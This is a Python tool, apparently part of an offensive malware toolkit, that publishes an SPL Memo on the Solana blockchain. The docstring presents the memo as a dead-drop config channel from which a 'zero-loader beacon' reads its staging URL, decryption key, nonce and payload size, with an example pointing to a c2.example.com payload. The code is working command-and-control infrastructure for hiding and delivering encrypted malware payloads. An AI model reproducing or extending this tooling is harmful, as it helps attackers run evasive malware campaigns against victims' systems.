#!/usr/bin/env python3
"""
publish_memo.py — Broadcast a Solana transaction containing an SPL Memo.

The SPL Memo program (MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr) stores
arbitrary text in a transaction's log messages.  The zero-loader beacon reads
this memo at runtime to obtain the staging URL, decryption key, nonce, payload
size, and compression flag — without any of that data being compiled into the
binary.

CLI usage:
    python publish_memo.py --keypair <wallet.json> --memo "<text>" [options]

    <wallet.json>  A JSON file containing the 64-byte keypair as an int array.
                   Generated by create_wallet.py or `solana-keygen new`.

Options:
    --rpc   <url>   Solana RPC endpoint (default: api.mainnet-beta.solana.com)
    --json          Print result as one-line JSON to stdout.
                    {"ok": true,  "signature": "..."}
                    {"ok": false, "error": "..."}

Examples:
    # Publish zero-loader beacon memo (mainnet)
    python publish_memo.py \\
        --keypair wallet.json \\
        --memo "https://c2.example.com/payload.dat|a1b2...32hex...|001122...24hex...|725708|1"

    # Devnet test
    python publish_memo.py --keypair wallet.json --memo "hello world" \\
        --rpc https://api.devnet.solana.com

Memo format for zero-loader:
    <staging_url>|<32-hex-chaskey-key>|<24-hex-nonce>|<decimal-original-size>|<0-or-1>

    Fields are written to memo.txt by Encrypt.py after every encrypt run.
"""

from __future__ import annotations

import argparse
import base64
import json
import sys
from pathlib import Path

try:
    import requests
    from solders.keypair import Keypair
    from solders.pubkey import Pubkey
    from solders.instruction import Instruction, AccountMeta
    from solders.hash import Hash
    from solders.message import MessageV0
    from solders.transaction import VersionedTransaction
except ImportError as exc:
    sys.exit(f"ERROR: missing dependency — {exc}\nRun: pip install -r requirements.txt")

DEFAULT_RPC  = "https://api.mainnet-beta.solana.com"
MEMO_PROGRAM = Pubkey.from_string("MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr")


# ---------------------------------------------------------------------------
# RPC helpers
# ---------------------------------------------------------------------------

def rpc_post(rpc_url: str, method: str, params: list) -> dict:
    try:
        r = requests.post(
            rpc_url,
            json={"jsonrpc": "2.0", "id": 1, "method": method, "params": params},
            timeout=30,
            headers={"Content-Type": "application/json"},
        )
        r.raise_for_status()
        return r.json()
    except requests.RequestException as e:
        return {"_net_error": str(e)}


def get_latest_blockhash(rpc_url: str):
    """Return the latest blockhash string, or None on failure."""
    data = rpc_post(rpc_url, "getLatestBlockhash", [{"commitment": "finalized"}])
    if "_net_error" in data:
        return None, data["_net_error"]
    try:
        bh = data["result"]["value"]["blockhash"]
        return bh, None
    except (KeyError, TypeError) as e:
        return None, f"Unexpected RPC response: {e} — {data}"


# ---------------------------------------------------------------------------
# Transaction builder + sender
# ---------------------------------------------------------------------------

def publish(keypair_path: Path, memo_text: str, rpc_url: str) -> dict:
    # ---- load keypair ----
    try:
        raw_list = json.loads(keypair_path.read_text())
        if not isinstance(raw_list, list) or len(raw_list) != 64:
            return {"ok": False, "error": "Keypair JSON must be a 64-element int array"}
        raw = bytes(raw_list)
        kp  = Keypair.from_bytes(raw)
    except Exception as e:
        return {"ok": False, "error": f"Keypair load failed: {e}"}

    # ---- recent blockhash ----
    blockhash, err = get_latest_blockhash(rpc_url)
    if not blockhash:
        return {"ok": False, "error": f"Failed to fetch blockhash: {err}"}

    # ---- build instruction ----
    ix = Instruction(
        program_id=MEMO_PROGRAM,
        accounts=[AccountMeta(pubkey=kp.pubkey(), is_signer=True, is_writable=False)],
        data=memo_text.encode("utf-8"),
    )

    # ---- build + sign transaction ----
    try:
        msg = MessageV0.try_compile(
            payer=kp.pubkey(),
            instructions=[ix],
            address_lookup_table_accounts=[],
            recent_blockhash=Hash.from_string(blockhash),
        )
        tx = VersionedTransaction(msg, [kp])
    except Exception as e:
        return {"ok": False, "error": f"Transaction build failed: {e}"}

    # ---- broadcast ----
    tx_b64  = base64.b64encode(bytes(tx)).decode()
    result  = rpc_post(rpc_url, "sendTransaction", [tx_b64, {"encoding": "base64"}])

    if "_net_error" in result:
        return {"ok": False, "error": result["_net_error"]}

    # RPC error object (e.g. insufficient funds, blockhash expired)
    if "error" in result and "result" not in result:
        err_obj = result["error"]
        if isinstance(err_obj, dict):
            msg_txt = err_obj.get("message", str(err_obj))
        else:
            msg_txt = str(err_obj)
        return {"ok": False, "error": msg_txt}

    sig = result.get("result")
    if not sig:
        return {"ok": False, "error": f"Unexpected RPC response: {result}"}

    return {
        "ok":        True,
        "signature": sig,
        "explorer":  f"https://solscan.io/tx/{sig}",
    }


# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------

def main() -> None:
    ap = argparse.ArgumentParser(description="Publish an SPL Memo on Solana")
    ap.add_argument("--keypair", required=True, help="Path to keypair JSON file")
    ap.add_argument("--memo",    required=True, help="Memo text to publish on-chain")
    ap.add_argument("--rpc",     default=DEFAULT_RPC, help="Solana RPC endpoint URL")
    ap.add_argument("--json",    dest="json_mode", action="store_true",
                    help="Print result as one-line JSON to stdout")
    args = ap.parse_args()

    result = publish(Path(args.keypair), args.memo, args.rpc)

    if args.json_mode:
        print(json.dumps(result))
        return

    if result["ok"]:
        print(f"[+] Transaction sent!")
        print(f"    Signature : {result['signature']}")
        print(f"    Explorer  : {result['explorer']}")
    else:
        print(f"[-] Failed: {result['error']}", file=sys.stderr)
        sys.exit(1)


if __name__ == "__main__":
    main()
